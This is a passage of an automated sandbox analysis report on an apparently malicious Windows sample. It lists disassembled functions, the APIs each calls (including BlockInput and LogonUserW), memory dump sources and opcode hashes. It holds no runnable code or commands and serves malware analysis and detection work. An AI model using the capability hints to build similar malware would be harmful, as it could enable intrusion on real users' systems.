                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LogonUser
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: N@
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-1509896676
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00411E78 Relevance: .3, Instructions: 326COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1be110723fa64262e89d0aec0a1a20255c1bae91910aebb39a61821022ff9223
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 55B1B533D0A6B3058736836D05582BFFE626E91B8031FC396CDD03F399C62AAD9295D4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493B3F8 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2a16815e0bd7e2633cb4c5d70fc281cab6d34b59610615e36e58c677af68ce68
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0141B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493B288 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f26af1cc35ee436bd35c112aa55096a99c16bebf167bfb6d01eec10cb43c1f13
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1018078A00209EFCB44DF98C5909AEF7B5FB48310F2086A9E809A7705D730BE41DB80
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0493B2E8 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a592a3c9ff3319889c9d44e871ba518bf2aba1b785e04a608b31e3d8d9309851
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD019278E01109EFCB44DF98C5909AEF7B5FB48310F2085A9D809A7305D730BE41DB80
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 04939C38 Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1786889598.0000000004937000.00000040.00000020.00020000.00000000.sdmp, Offset: 04937000, based on PE: false
